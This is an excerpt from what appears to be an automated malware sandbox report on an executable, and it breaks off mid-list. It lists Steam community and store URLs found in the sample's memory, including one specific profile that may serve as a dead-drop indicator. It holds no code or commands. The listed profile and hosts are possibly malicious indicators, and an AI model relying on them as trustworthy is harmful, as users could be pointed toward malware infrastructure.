Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.n
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/#
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/Hzzp
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/c
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/discussions/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199804377619
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/market/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619.com/profiles/76561199804377619
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/badges
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/inventory/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619C:
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619curi
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://steamcommunity.com/workshop/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: https://store.steam
Source: 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://store.steampowered.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
Source: 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://store.steampowered.com/about/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://store.steampowered.com/explore/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://store.steampowered.com/legal/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://store.steampowered.com/mobile
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 